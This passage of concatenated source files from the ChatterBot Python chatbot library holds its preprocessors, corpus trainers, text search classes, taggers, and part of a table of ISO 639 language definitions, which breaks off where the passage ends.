Adapter # If a dictionary was passed in, check if it has an import_path attribute if isinstance(validate_class, dict): if 'import_path' not in validate_class: raise Adapter.InvalidAdapterTypeException( 'The dictionary {} must contain a value for "import_path"'.format( str(validate_class) ) ) # Set the class to the import path for the next check validate_class = validate_class.get('import_path') if not issubclass(import_module(validate_class), adapter_class): raise Adapter.InvalidAdapterTypeException( '{} must be a subclass of {}'.format( validate_class, adapter_class.__name__ ) ) def get_response_time(chatbot, statement='Hello'): """ Returns the amount of time taken for a given chat bot to return a response. :param chatbot: A chat bot instance. :type chatbot: ChatBot :returns: The response time in seconds. :rtype: float """ import time start_time = time.time() chatbot.get_response(statement) return time.time() - start_time def print_progress_bar(description, iteration_counter, total_items, progress_bar_length=20): """ Print progress bar :param description: Training description :type description: str :param iteration_counter: Incremental counter :type iteration_counter: int :param total_items: total number items :type total_items: int :param progress_bar_length: Progress bar length :type progress_bar_length: int :returns: void :rtype: void """ import sys percent = float(iteration_counter) / total_items hashes = '#' * int(round(percent * progress_bar_length)) spaces = ' ' * (progress_bar_length - len(hashes)) sys.stdout.write('\r{0}: [{1}] {2}%'.format(description, hashes + spaces, int(round(percent * 100)))) sys.stdout.flush() if total_items == iteration_counter: print('\r') File: chatterbot/preprocessors.py """ Statement pre-processors. """ def clean_whitespace(statement): """ Remove any consecutive whitespace characters from the statement text. """ import re # Replace linebreaks and tabs with spaces statement.text = statement.text.replace('\n', ' ').replace('\r', ' ').replace('\t', ' ') # Remove any leeding or trailing whitespace statement.text = statement.text.strip() # Remove consecutive spaces statement.text = re.sub(' +', ' ', statement.text) return statement def unescape_html(statement): """ Convert escaped html characters into unescaped html characters. For example: "&lt;b&gt;" becomes "<b>". """ import html statement.text = html.unescape(statement.text) return statement def convert_to_ascii(statement): """ Converts unicode characters to ASCII character equivalents. For example: "på fédéral" becomes "pa federal". """ import unicodedata text = unicodedata.normalize('NFKD', statement.text) text = text.encode('ascii', 'ignore').decode('utf-8') statement.text = str(text) return statement File: chatterbot/trainers.py import os import sys import csv import time from dateutil import parser as date_parser from chatterbot.conversation import Statement from chatterbot.tagging import PosLemmaTagger from chatterbot import utils class Trainer(object): """ Base class for all other trainer classes. :param boolean show_training_progress: Show progress indicators for the trainer. The environment variable ``CHATTERBOT_SHOW_TRAINING_PROGRESS`` can also be set to control this. ``show_training_progress`` will override the environment variable if it is set. """ def __init__(self, chatbot, **kwargs): self.chatbot = chatbot environment_default = os.getenv('CHATTERBOT_SHOW_TRAINING_PROGRESS', True) self.show_training_progress = kwargs.get( 'show_training_progress', environment_default ) def get_preprocessed_statement(self, input_statement): """ Preprocess the input statement. """ for preprocessor in self.chatbot.preprocessors: input_statement = preprocessor(input_statement) return input_statement def train(self, *args, **kwargs): """ This method must be overridden by a child class. """ raise self.TrainerInitializationException() class TrainerInitializationException(Exception): """ Exception raised when a base class has not overridden the required methods on the Trainer base class. """ def __init__(self, message=None): default = ( 'A training class must be specified before calling train(). ' 'See http://chatterbot.readthedocs.io/en/stable/training.html' ) super().__init__(message or default) def _generate_export_data(self): result = [] for statement in self.chatbot.storage.filter(): if statement.in_response_to: result.append([statement.in_response_to, statement.text]) return result def export_for_training(self, file_path='./export.json'): """ Create a file from the database that can be used to train other chat bots. """ import json export = {'conversations': self._generate_export_data()} with open(file_path, 'w+', encoding='utf8') as jsonfile: json.dump(export, jsonfile, ensure_ascii=False) class ListTrainer(Trainer): """ Allows a chat bot to be trained using a list of strings where the list represents a conversation. """ def train(self, conversation): """ Train the chat bot based on the provided list of statements that represents a single conversation. """ previous_statement_text = None previous_statement_search_text = '' statements_to_create = [] for conversation_count, text in enumerate(conversation): if self.show_training_progress: utils.print_progress_bar( 'List Trainer', conversation_count + 1, len(conversation) ) statement_search_text = self.chatbot.storage.tagger.get_text_index_string(text) statement = self.get_preprocessed_statement( Statement( text=text, search_text=statement_search_text, in_response_to=previous_statement_text, search_in_response_to=previous_statement_search_text, conversation='training' ) ) previous_statement_text = statement.text previous_statement_search_text = statement_search_text statements_to_create.append(statement) self.chatbot.storage.create_many(statements_to_create) class ChatterBotCorpusTrainer(Trainer): """ Allows the chat bot to be trained using data from the ChatterBot dialog corpus. """ def train(self, *corpus_paths): from chatterbot.corpus import load_corpus, list_corpus_files data_file_paths = [] # Get the paths to each file the bot will be trained with for corpus_path in corpus_paths: data_file_paths.extend(list_corpus_files(corpus_path)) for corpus, categories, file_path in load_corpus(*data_file_paths): statements_to_create = [] # Train the chat bot with each statement and response pair for conversation_count, conversation in enumerate(corpus): if self.show_training_progress: utils.print_progress_bar( 'Training ' + str(os.path.basename(file_path)), conversation_count + 1, len(corpus) ) previous_statement_text = None previous_statement_search_text = '' for text in conversation: statement_search_text = self.chatbot.storage.tagger.get_text_index_string(text) statement = Statement( text=text, search_text=statement_search_text, in_response_to=previous_statement_text, search_in_response_to=previous_statement_search_text, conversation='training' ) statement.add_tags(*categories) statement = self.get_preprocessed_statement(statement) previous_statement_text = statement.text previous_statement_search_text = statement_search_text statements_to_create.append(statement) if statements_to_create: self.chatbot.storage.create_many(statements_to_create) class UbuntuCorpusTrainer(Trainer): """ Allow chatbots to be trained with the data from the Ubuntu Dialog Corpus. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) home_directory = os.path.expanduser('~') self.data_download_url = kwargs.get( 'ubuntu_corpus_data_download_url', 'http://cs.mcgill.ca/~jpineau/datasets/ubuntu-corpus-1.0/ubuntu_dialogs.tgz' ) self.data_directory = kwargs.get( 'ubuntu_corpus_data_directory', os.path.join(home_directory, 'ubuntu_data') ) self.extracted_data_directory = os.path.join( self.data_directory, 'ubuntu_dialogs' ) # Create the data directory if it does not already exist if not os.path.exists(self.data_directory): os.makedirs(self.data_directory) def is_downloaded(self, file_path): """ Check if the data file is already downloaded. """ if os.path.exists(file_path): self.chatbot.logger.info('File is already downloaded') return True return False def is_extracted(self, file_path): """ Check if the data file is already extracted. """ if os.path.isdir(file_path): self.chatbot.logger.info('File is already extracted') return True return False def download(self, url, show_status=True): """ Download a file from the given url. Show a progress indicator for the download status. Based on: http://stackoverflow.com/a/15645088/1547223 """ import requests file_name = url.split('/')[-1] file_path = os.path.join(self.data_directory, file_name) # Do not download the data if it already exists if self.is_downloaded(file_path): return file_path with open(file_path, 'wb') as open_file: print('Downloading %s' % url) response = requests.get(url, stream=True) total_length = response.headers.get('content-length') if total_length is None: # No content length header open_file.write(response.content) else: download = 0 total_length = int(total_length) for data in response.iter_content(chunk_size=4096): download += len(data) open_file.write(data) if show_status: done = int(50 * download / total_length) sys.stdout.write('\r[%s%s]' % ('=' * done, ' ' * (50 - done))) sys.stdout.flush() # Add a new line after the download bar sys.stdout.write('\n') print('Download location: %s' % file_path) return file_path def extract(self, file_path): """ Extract a tar file at the specified file path. """ import tarfile print('Extracting {}'.format(file_path)) if not os.path.exists(self.extracted_data_directory): os.makedirs(self.extracted_data_directory) def track_progress(members): sys.stdout.write('.') for member in members: # This will be the current file being extracted yield member with tarfile.open(file_path) as tar: tar.extractall(path=self.extracted_data_directory, members=track_progress(tar)) self.chatbot.logger.info('File extracted to {}'.format(self.extracted_data_directory)) return True def train(self): import glob tagger = PosLemmaTagger(language=self.chatbot.storage.tagger.language) # Download and extract the Ubuntu dialog corpus if needed corpus_download_path = self.download(self.data_download_url) # Extract if the directory does not already exist if not self.is_extracted(self.extracted_data_directory): self.extract(corpus_download_path) extracted_corpus_path = os.path.join( self.extracted_data_directory, '**', '**', '*.tsv' ) def chunks(items, items_per_chunk): for start_index in range(0, len(items), items_per_chunk): end_index = start_index + items_per_chunk yield items[start_index:end_index] file_list = glob.glob(extracted_corpus_path) file_groups = tuple(chunks(file_list, 10000)) start_time = time.time() for tsv_files in file_groups: statements_from_file = [] for tsv_file in tsv_files: with open(tsv_file, 'r', encoding='utf-8') as tsv: reader = csv.reader(tsv, delimiter='\t') previous_statement_text = None previous_statement_search_text = '' for row in reader: if len(row) > 0: statement = Statement( text=row[3], in_response_to=previous_statement_text, conversation='training', created_at=date_parser.parse(row[0]), persona=row[1] ) for preprocessor in self.chatbot.preprocessors: statement = preprocessor(statement) statement.search_text = tagger.get_text_index_string(statement.text) statement.search_in_response_to = previous_statement_search_text previous_statement_text = statement.text previous_statement_search_text = statement.search_text statements_from_file.append(statement) self.chatbot.storage.create_many(statements_from_file) print('Training took', time.time() - start_time, 'seconds.') File: chatterbot/search.py class IndexedTextSearch: """ :param statement_comparison_function: A comparison class. Defaults to ``LevenshteinDistance``. :param search_page_size: The maximum number of records to load into memory at a time when searching. Defaults to 1000 """ name = 'indexed_text_search' def __init__(self, chatbot, **kwargs): from chatterbot.comparisons import LevenshteinDistance self.chatbot = chatbot statement_comparison_function = kwargs.get( 'statement_comparison_function', LevenshteinDistance ) self.compare_statements = statement_comparison_function( language=self.chatbot.storage.tagger.language ) self.search_page_size = kwargs.get( 'search_page_size', 1000 ) def search(self, input_statement, **additional_parameters): """ Search for close matches to the input. Confidence scores for subsequent results will order of increasing value. :param input_statement: A statement. :type input_statement: chatterbot.conversation.Statement :param **additional_parameters: Additional parameters to be passed to the ``filter`` method of the storage adapter when searching. :rtype: Generator yielding one closest matching statement at a time. """ self.chatbot.logger.info('Beginning search for close text match') input_search_text = input_statement.search_text if not input_statement.search_text: self.chatbot.logger.warn( 'No value for search_text was available on the provided input' ) input_search_text = self.chatbot.storage.tagger.get_text_index_string( input_statement.text ) search_parameters = { 'search_text_contains': input_search_text, 'persona_not_startswith': 'bot:', 'page_size': self.search_page_size } if additional_parameters: search_parameters.update(additional_parameters) statement_list = self.chatbot.storage.filter(**search_parameters) best_confidence_so_far = 0 self.chatbot.logger.info('Processing search results') # Find the closest matching known statement for statement in statement_list: confidence = self.compare_statements(input_statement, statement) if confidence > best_confidence_so_far: best_confidence_so_far = confidence statement.confidence = confidence self.chatbot.logger.info('Similar text found: {} {}'.format( statement.text, confidence )) yield statement class TextSearch: """ :param statement_comparison_function: A comparison class. Defaults to ``LevenshteinDistance``. :param search_page_size: The maximum number of records to load into memory at a time when searching. Defaults to 1000 """ name = 'text_search' def __init__(self, chatbot, **kwargs): from chatterbot.comparisons import LevenshteinDistance self.chatbot = chatbot statement_comparison_function = kwargs.get( 'statement_comparison_function', LevenshteinDistance ) self.compare_statements = statement_comparison_function( language=self.chatbot.storage.tagger.language ) self.search_page_size = kwargs.get( 'search_page_size', 1000 ) def search(self, input_statement, **additional_parameters): """ Search for close matches to the input. Confidence scores for subsequent results will order of increasing value. :param input_statement: A statement. :type input_statement: chatterbot.conversation.Statement :param **additional_parameters: Additional parameters to be passed to the ``filter`` method of the storage adapter when searching. :rtype: Generator yielding one closest matching statement at a time. """ self.chatbot.logger.info('Beginning search for close text match') search_parameters = { 'persona_not_startswith': 'bot:', 'page_size': self.search_page_size } if additional_parameters: search_parameters.update(additional_parameters) statement_list = self.chatbot.storage.filter(**search_parameters) best_confidence_so_far = 0 self.chatbot.logger.info('Processing search results') # Find the closest matching known statement for statement in statement_list: confidence = self.compare_statements(input_statement, statement) if confidence > best_confidence_so_far: best_confidence_so_far = confidence statement.confidence = confidence self.chatbot.logger.info('Similar text found: {} {}'.format( statement.text, confidence )) yield statement File: chatterbot/exceptions.py class OptionalDependencyImportError(ImportError): """ An exception raised when a feature requires an optional dependency to be installed. """ pass File: chatterbot/tagging.py import string from chatterbot import languages class LowercaseTagger(object): """ Returns the text in lowercase. """ def __init__(self, language=None): self.language = language or languages.ENG def get_text_index_string(self, text): return text.lower() class PosLemmaTagger(object): def __init__(self, language=None): import spacy self.language = language or languages.ENG self.punctuation_table = str.maketrans(dict.fromkeys(string.punctuation)) self.nlp = spacy.load(self.language.ISO_639_1.lower()) def get_text_index_string(self, text): """ Return a string of text containing part-of-speech, lemma pairs. """ bigram_pairs = [] if len(text) <= 2: text_without_punctuation = text.translate(self.punctuation_table) if len(text_without_punctuation) >= 1: text = text_without_punctuation document = self.nlp(text) if len(text) <= 2: bigram_pairs = [ token.lemma_.lower() for token in document ] else: tokens = [ token for token in document if token.is_alpha and not token.is_stop ] if len(tokens) < 2: tokens = [ token for token in document if token.is_alpha ] for index in range(1, len(tokens)): bigram_pairs.append('{}:{}'.format( tokens[index - 1].pos_, tokens[index].lemma_.lower() )) if not bigram_pairs: bigram_pairs = [ token.lemma_.lower() for token in document ] return ' '.join(bigram_pairs) File: chatterbot/languages.py class AAR: ISO_639_1 = '' ISO_639 = 'aar' ENGLISH_NAME = 'Afar' class ABK: ISO_639_1 = '' ISO_639 = 'abk' ENGLISH_NAME = 'Abkhazian' class ACE: ISO_639_1 = '' ISO_639 = 'ace' ENGLISH_NAME = 'Achinese' class ACH: ISO_639_1 = '' ISO_639 = 'ach' ENGLISH_NAME = 'Acoli' class ADA: ISO_639_1 = '' ISO_639 = 'ada' ENGLISH_NAME = 'Adangme' class ADY: ISO_639_1 = '' ISO_639 = 'ady' ENGLISH_NAME = 'Adyghe' class AFH: ISO_639_1 = '' ISO_639 = 'afh' ENGLISH_NAME = 'Afrihili' class AFR: ISO_639_1 = '' ISO_639 = 'afr' ENGLISH_NAME = 'Afrikaans' class AIN: ISO_639_1 = '' ISO_639 = 'ain' ENGLISH_NAME = 'Ainu' class AKA: ISO_639_1 = '' ISO_639 = 'aka' ENGLISH_NAME = 'Akan' class AKK: ISO_639_1 = '' ISO_639 = 'akk' ENGLISH_NAME = 'Akkadian' class ALB: ISO_639_1 = '' ISO_639 = 'alb' ENGLISH_NAME = 'Albanian' class ALE: ISO_639_1 = '' ISO_639 = 'ale' ENGLISH_NAME = 'Aleut' class ALT: ISO_639_1 = '' ISO_639 = 'alt' ENGLISH_NAME = 'SouthernAltai' class AMH: ISO_639_1 = '' ISO_639 = 'amh' ENGLISH_NAME = 'Amharic' class ANP: ISO_639_1 = '' ISO_639 = 'anp' ENGLISH_NAME = 'Angika' class ARA: ISO_639_1 = '' ISO_639 = 'ara' ENGLISH_NAME = 'Arabic' class ARG: ISO_639_1 = '' ISO_639 = 'arg' ENGLISH_NAME = 'Aragonese' class ARM: ISO_639_1 = '' ISO_639 = 'arm' ENGLISH_NAME = 'Armenian' class ARN: ISO_639_1 = '' ISO_639 = 'arn' ENGLISH_NAME = 'Mapudungun' class ARP: ISO_639_1 = '' ISO_639 = 'arp' ENGLISH_NAME = 'Arapaho' class ARW: ISO_639_1 = '' ISO_639 = 'arw' ENGLISH_NAME = 'Arawak' class ASM: ISO_639_1 = '' ISO_639 = 'asm' ENGLISH_NAME = 'Assamese' class AST: ISO_639_1 = '' ISO_639 = 'ast' ENGLISH_NAME = 'Asturian' class AVA: ISO_639_1 = '' ISO_639 = 'ava' ENGLISH_NAME = 'Avaric' class AVE: ISO_639_1 = '' ISO_639 = 'ave' ENGLISH_NAME = 'Avestan' class AWA: ISO_639_1 = '' ISO_639 = 'awa' ENGLISH_NAME = 'Awadhi' class AYM: ISO_639_1 = '' ISO_639 = 'aym' ENGLISH_NAME = 'Aymara' class AZE: ISO_639_1 = '' ISO_639 = 'aze' ENGLISH_NAME = 'Azerbaijani' class BAK: ISO_639_1 = '' ISO_639 = 'bak' ENGLISH_NAME = 'Bashkir' class BAL: ISO_639_1 = '' ISO_639 = 'bal' ENGLISH_NAME = 'Baluchi' class BAM: ISO_639_1 = '' ISO_639 = 'bam' ENGLISH_NAME = 'Bambara' class BAN: ISO_639_1 = '' ISO_639 = 'ban' ENGLISH_NAME = 'Balinese' class BAQ: ISO_639_1 = '' ISO_639 = 'baq' ENGLISH_NAME = 'Basque' class BAS: ISO_639_1 = '' ISO_639 = 'bas' ENGLISH_NAME = 'Basa' class BEJ: ISO_639_1 = '' ISO_639 = 'bej' ENGLISH_NAME = 'Beja' class BEL: ISO_639_1 = '' ISO_639 = 'bel' ENGLISH_NAME = 'Belarusian' class BEM: ISO_639_1 = '' ISO_639 = 'bem' ENGLISH_NAME = 'Bemba' class BEN: ISO_639_1 = 'bn' ISO_639 = 'ben' ENGLISH_NAME = 'Bengali' class BHO: ISO_639_1 = '' ISO_639 = 'bho' ENGLISH_NAME = 'Bhojpuri' class BIK: ISO_639_1 = '' ISO_639 = 'bik' ENGLISH_NAME = 'Bikol' class BIN: ISO_639_1 = '' ISO_639 = 'bin' ENGLISH_NAME = 'Bini' class BIS: ISO_639_1 = '' ISO_639 = 'bis' ENGLISH_NAME = 'Bislama' class BLA: ISO_639_1 = '' ISO_639 = 'bla' ENGLISH_NAME = 'Siksika' class BOS: ISO_639_1 = '' ISO_639 = 'bos' ENGLISH_NAME = 'Bosnian' class BRA: ISO_639_1 = '' ISO_639 = 'bra' ENGLISH_NAME = 'Braj' class BRE: ISO_639_1 = '' ISO_639 = 'bre' ENGLISH_NAME = 'Breton' class BUA: ISO_639_1 = '' ISO_639 = 'bua' ENGLISH_NAME = 'Buriat' class BUG: ISO_639_1 = '' ISO_639 = 'bug' ENGLISH_NAME = 'Buginese' class BUL: ISO_639_1 = '' ISO_639 = 'bul' ENGLISH_NAME = 'Bulgarian' class BUR: ISO_639_1 = '' ISO_639 = 'bur' ENGLISH_NAME = 'Burmese' class BYN: ISO_639_1 = '' ISO_639 = 'byn' ENGLISH_NAME = 'Blin' class CAD: ISO_639_1 = '' ISO_639 = 'cad' ENGLISH_NAME = 'Caddo' class CAR: ISO_639_1 = '' ISO_639 = 'car' ENGLISH_NAME = 'GalibiCarib' class CAT: ISO_639_1 = '' ISO_639 = 'cat' ENGLISH_NAME = 'Catalan' class CEB: ISO_639_1 = '' ISO_639 = 'ceb' ENGLISH_NAME = 'Cebuano' class CHA: ISO_639_1 = '' ISO_639 = 'cha' ENGLISH_NAME = 'Chamorro' class CHB: ISO_639_1 = '' ISO_639 = 'chb' ENGLISH_NAME = 'Chibcha' class CHE: ISO_639_1 = '' ISO_639 = 'che' ENGLISH_NAME = 'Chechen' class CHG: ISO_639_1 = '' ISO_639 = 'chg' ENGLISH_NAME = 'Chagatai' class CHI: ISO_639_1 = 'zh' ISO_639 = 'chi' ENGLISH_NAME = 'Chinese' class CHK: ISO_639_1 = '' ISO_639 = 'chk' ENGLISH_NAME = 'Chuukese' class CHM: ISO_639_1 = '' ISO_639 = 'chm' ENGLISH_NAME = 'Mari' class CHN: ISO_639_1 = '' ISO_639 = 'chn' ENGLISH_NAME = 'Chinookjargon' class CHO: ISO_639_1 = '' ISO_639 = 'cho' ENGLISH_NAME = 'Choctaw' class CHP: ISO_639_1 = '' ISO_639 = 'chp' ENGLISH_NAME = 'Chipewyan' class CHR: ISO_639_1 = '' ISO_639 = 'chr' ENGLISH_NAME = 'Cherokee' class CHV: ISO_639_1 = '' ISO_639 = 'chv' ENGLISH_NAME = 'Chuvash' class CHY: ISO_639_1 = '' ISO_639 = 'chy' ENGLISH_NAME = 'Cheyenne' class CNR: ISO_639_1 = '' ISO_639 = 'cnr' ENGLISH_NAME = 'Montenegrin' class COP: ISO_639_1 = '' ISO_639 = 'cop' ENGLISH_NAME = 'Coptic' class COR: ISO_639_1 = '' ISO_639 = 'cor' ENGLISH_NAME = 'Cornish' class COS: ISO_639_1 = '' ISO_639 = 'cos' ENGLISH_NAME = 'Corsican' class CPE: ISO_639_1 = '' ISO_639 = 'cpe' ENGLISH_NAME = 'Creolesandpidgins' class CPF: ISO_639_1 = '' ISO_639 = 'cpf' ENGLISH_NAME = 'Creolesandpidgins' class CPP: ISO_639_1 = '' ISO_639 = 'cpp' ENGLISH_NAME = 'Creolesandpidgins' class CRE: ISO_639_1 = '' ISO_639 = 'cre' ENGLISH_NAME = 'Cree' class CRH: ISO_639_1 = '' ISO_639 = 'crh' ENGLISH_NAME = 'CrimeanTatar' class CRP: ISO_639_1 = '' ISO_639 = 'crp' ENGLISH_NAME = 'Creolesandpidgins' class CSB: ISO_639_1 = '' ISO_639 = 'csb' ENGLISH_NAME = 'Kashubian' class CZE: ISO_639_1 = '' ISO_639 = 'cze' ENGLISH_NAME = 'Czech' class DAK: ISO_639_1 = '' ISO_639 = 'dak' ENGLISH_NAME = 'Dakota' class DAN: ISO_639_1 = '' ISO_639 = 'dan' ENGLISH_NAME = 'Danish' class DAR: ISO_639_1 = '' ISO_639 = 'dar' ENGLISH_NAME = 'Dargwa' class DEL: ISO_639_1 = '' ISO_639 = 'del' ENGLISH_NAME = 'Delaware' class DEN: ISO_639_1 = '' ISO_639 = 'den' ENGLISH_NAME = 'Slave' class DGR: ISO_639_1 = '' ISO_639 = 'dgr' ENGLISH_NAME = 'Dogrib' class DIN: ISO_639_1 = '' ISO_639 = 'din' ENGLISH_NAME = 'Dinka' class DIV: ISO_639_1 = '' ISO_639 = 'div' ENGLISH_NAME = 'Divehi' class DOI: ISO_639_1 = '' ISO_639 = 'doi' ENGLISH_NAME = 'Dogri' class DUA: ISO_639_1 = '' ISO_639 = 'dua' ENGLISH_NAME = 'Duala' class DUT: ISO_639_1 = 'nl' ISO_639 = 'dut' ENGLISH_NAME = 'Dutch' class DYU: ISO_639_1 = '' ISO_639 = 'dyu' ENGLISH_NAME = 'Dyula' class DZO: ISO_639_1 = '' ISO_639 = 'dzo' ENGLISH_NAME = 'Dzongkha' class EFI: ISO_639_1 = '' ISO_639 = 'efi' ENGLISH_NAME = 'Efik' class EKA: ISO_639_1 = '' ISO_639 = 'eka' ENGLISH_NAME = 'Ekajuk' class ELX: ISO_639_1 = '' ISO_639 = 'elx' ENGLISH_NAME = 'Elamite' class ENG: ISO_639_1 = 'en' ISO_639 = 'eng' ENGLISH_NAME = 'English' class EPO: ISO_639_1 = '' ISO_639 = 'epo' ENGLISH_NAME = 'Esperanto' class EST: ISO_639_1 = '' ISO_639 = 'est' ENGLISH_NAME = 'Estonian' class EWE: ISO_639_1 = '' ISO_639 = 'ewe' ENGLISH_NAME = 'Ewe' class EWO: ISO_639_1 = '' ISO_639 = 'ewo' ENGLISH_NAME = 'Ewondo' class FAN: ISO_639_1 = '' ISO_639 = 'fan' ENGLISH_NAME = 'Fang' class FAO: ISO_639_1 = '' ISO_639 = 'fao' ENGLISH_NAME = 'Faroese' class FAT: ISO_639_1 = '' ISO_639 = 'fat' ENGLISH_NAME = 'Fanti' class FIJ: ISO_639_1 = '' ISO_639 = 'fij' ENGLISH_NAME = 'Fijian' class FIL: ISO_639_1 = '' ISO_639 = 'fil' ENGLISH_NAME = 'Filipino' class FIN: ISO_639_1 = '' ISO_639 = 'fin' ENGLISH_NAME = 'Finnish' class FON: ISO_639_1 = '' ISO_639 = 'fon' ENGLISH_NAME = 'Fon' class FRE: ISO_639_1 = '' ISO_639 = 'fre' ENGLISH_NAME = 'French' class FRR: ISO_639_1 = '' ISO_639 = 'frr' ENGLISH_NAME = 'NorthernFrisian' class FRS: ISO_639_1 = '' ISO_639 = 'frs' ENGLISH_NAME = 'EasternFrisian' class FRY: ISO_639_1 = '' ISO_639 = 'fry' ENGLISH_NAME = 'WesternFrisian' class FUL: ISO_639_1 = '' ISO_639 = 'ful' ENGLISH_NAME = 'Fulah' class FUR: ISO_639_1 = '' ISO_639 = 'fur' ENGLISH_NAME = 'Friulian' class GAA: ISO_639_1 = '' ISO_639 = 'gaa' ENGLISH_NAME = 'Ga' class GAY: ISO_639_1 = '' ISO_639 = 'gay' ENGLISH_NAME = 'Gayo' class GBA: ISO_639_1 = '' ISO_639 = 'gba' ENGLISH_NAME = 'Gbaya' class GEO: ISO_639_1 = '' ISO_639 = 'geo' ENGLISH_NAME = 'Georgian' class GER: ISO_639_1 = 'de' ISO_639 = 'ger' ENGLISH_NAME = 'German' class GEZ: ISO_639_1 = '' ISO_639 = 'gez' ENGLISH_NAME = 'Geez' class GIL: ISO_639_1 = '' ISO_639 = 'gil' ENGLISH_NAME = 'Gilbertese' class GLA: ISO_639_1 = '' ISO_639 = 'gla' ENGLISH_NAME = 'Gaelic' class GLE: ISO_639_1 = '' ISO_639 = 'gle' ENGLISH_NAME = 'Irish' class GLG: ISO_639_1 = '' ISO_639 = 'glg' ENGLISH_NAME = 'Galician' class GLV: ISO_639_1 = '' ISO_639 = 'glv' ENGLISH_NAME = 'Manx' class GON: ISO_639_1 = '' ISO_639 = 'gon' ENGLISH_NAME = 'Gondi' class GOR: ISO_639_1 = '' ISO_639 = 'gor' ENGLISH_NAME = 'Gorontalo' class GOT: ISO_639_1 = '' ISO_639 = 'got' ENGLISH_NAME = 'Gothic' class GRB: ISO_639_1 = '' ISO_639 = 'grb' ENGLISH_NAME = 'Grebo' class GRE: ISO_639_1 = 'el' ISO_639 = 'gre' ENGLISH_NAME = 'Greek' class GRN: ISO_639_1 = '' ISO_639 = 'grn' ENGLISH_NAME = 'Guarani' class GSW: ISO_639_1 = '' ISO_639 = 'gsw' ENGLISH_NAME = 'SwissGerman' class GUJ: ISO_639_1 = '' ISO_639 = 'guj' ENGLISH_NAME = 'Gujarati' class GWI: ISO_639_1 = '' ISO_639 = 'gwi' ENGLISH_NAME = 'Gwichin' class HAI: ISO_639_1 = '' ISO_639 = 'hai' ENGLISH_NAME = 'Haida' class HAT: ISO_639_1 = '' ISO_639 = 'hat' ENGLISH_NAME = 'Haitian' class HAU: ISO_639_1 = '' ISO_639 = 'hau' ENGLISH_NAME = 'Hausa' class HAW: ISO_639_1 = '' ISO_639 = 'haw' ENGLISH_NAME = 'Hawaiian' class HEB: ISO_639_1 = 'he' ISO_639 = 'heb' ENGLISH_NAME = 'Hebrew' class HER: ISO_639_1 = '' ISO_639 = 'her' ENGLISH_NAME = 'Herero' class HIL: ISO_639_1 = '' ISO_639 = 'hil' ENGLISH_NAME = 'Hiligaynon' class HIN: ISO_639_1 = 'hi' ISO_639 = 'hin' ENGLISH_NAME = 'Hindi' class HIT: ISO_639_1 = '' ISO_639 = 'hit' ENGLISH_NAME = 'Hittite' class HMN: ISO_639_1 = '' ISO_639 = 'hmn' ENGLISH_NAME = 'Hmong' class HMO: ISO_639_1 = '' ISO_639 = 'hmo' ENGLISH_NAME = 'HiriMotu' class HRV: ISO_639_1 = '' ISO_639 = 'hrv' ENGLISH_NAME = 'Croatian' class HSB: ISO_639_1 = '' ISO_639 = 'hsb' ENGLISH_NAME = 'UpperSorbian' class HUN: ISO_639_1 = '' ISO_639 = 'hun' ENGLISH_NAME = 'Hungarian' class HUP: ISO_639_1 = '' ISO_639 = 'hup' ENGLISH_NAME = 'Hupa' class IBA: ISO_639_1 = '' ISO_639 = 'iba' ENGLISH_NAME = 'Iban' class IBO: ISO_639_1 = '' ISO_639 = 'ibo' ENGLISH_NAME = 'Igbo' class ICE: ISO_639_1 = '' ISO_639 = 'ice' ENGLISH_NAME = 'Icelandic' class IDO: ISO_639_1 = '' ISO_639 = 'ido' ENGLISH_NAME = 'Ido' class III: ISO_639_1 = '' ISO_639 = 'iii' ENGLISH_NAME = 'SichuanYi' class IKU: ISO_639_1 = '' ISO_639 = 'iku' ENGLISH_NAME = 'Inuktitut' class ILE: ISO_639_1 = '' ISO_639 = 'ile' ENGLISH_NAME = 'Interlingue' class ILO: ISO_639_1 = '' ISO_639 = 'ilo' ENGLISH_NAME = 'Iloko' class INA: ISO_639_1 = '' ISO_639 = 'ina' ENGLISH_NAME = 'Interlingua' class IND: ISO_639_1 = 'id' ISO_639 = 'ind' ENGLISH_NAME = 'Indonesian' class INH: ISO_639_1 = '' ISO_639 = 'inh' ENGLISH_NAME = 'Ingush' class IPK: ISO_639_1 = '' ISO_639 = 'ipk' ENGLISH_NAME = 'Inupiaq' class ITA: ISO_639_1 = '' ISO_639 = 'ita' ENGLISH_NAME = 'Italian' class JAV: ISO_639_1 = '' ISO_639 = 'jav' ENGLISH_NAME = 'Javanese' class JBO: ISO_639_1 = '' ISO_639 = 'jbo' ENGLISH_NAME = 'Lojban' class JPN: ISO_639_1 = 'ja' ISO_639 = 'jpn' ENGLISH_NAME = 'Japanese' class JPR: ISO_639_1 = '' ISO_639 = 'jpr' ENGLISH_NAME = 'JudeoPersian' class JRB: ISO_639_1 = '' ISO_639 = 'jrb' ENGLISH_NAME = 'JudeoArabic' class KAA: ISO_639_1 = '' ISO_639 = 'kaa' ENGLISH_NAME = 'KaraKalpak' class KAB: ISO_639_1 = '' ISO_639 = 'kab' ENGLISH_NAME = 'Kabyle' class KAC: ISO_639_1 = '' ISO_639 = 'kac' ENGLISH_NAME = 'Kachin' class KAL: ISO_639_1 = '' ISO_639 = 'kal' ENGLISH_NAME = 'Kalaallisut' class KAM: ISO_639_1 = '' ISO_639 = 'kam' ENGLISH_NAME = 'Kamba' class KAN: ISO_639_1 = '' ISO_639 = 'kan' ENGLISH_NAME = 'Kannada' class KAS: ISO_639_1 = '' ISO_639 = 'kas' ENGLISH_NAME = 'Kashmiri' class KAU: ISO_639_1 = '' ISO_639 = 'kau' ENGLISH_NAME = 'Kanuri' class KAW: ISO_639_1 = '' ISO_639 = 'kaw' ENGLISH_NAME = 'Kawi' class KAZ: ISO_639_1 = '' ISO_639 = 'kaz' ENGLISH_NAME = 'Kazakh' class KBD: ISO_639_1 = '' ISO_639 = 'kbd' ENGLISH_NAME = 'Kabardian' class KHA: ISO_639_1 = '' ISO_639 = 'kha' ENGLISH_NAME = 'Khasi' class KHM: ISO_639_1 = '' ISO_639 = 'khm' ENGLISH_NAME = 'CentralKhmer' class KHO: ISO_639_1 = '' ISO_639 = 'kho' ENGLISH_NAME = 'Khotanese' class KIK: ISO_639_1 = '' ISO_639 = 'kik' ENGLISH_NAME = 'Kikuyu' class KIN: ISO_639_1 = '' ISO_639 = 'kin' ENGLISH_NAME = 'Kinyarwanda' class KIR: ISO_639_1 = '' ISO_639 = 'kir' ENGLISH_NAME = 'Kirghiz' class KMB: ISO_639_1 = '' ISO_639 = 'kmb' ENGLISH_NAME = 'Kimbundu' class KOK: ISO_639_1 = '' ISO_639 = 'kok' ENGLISH_NAME = 'Konkani' class KOM: ISO_639_1 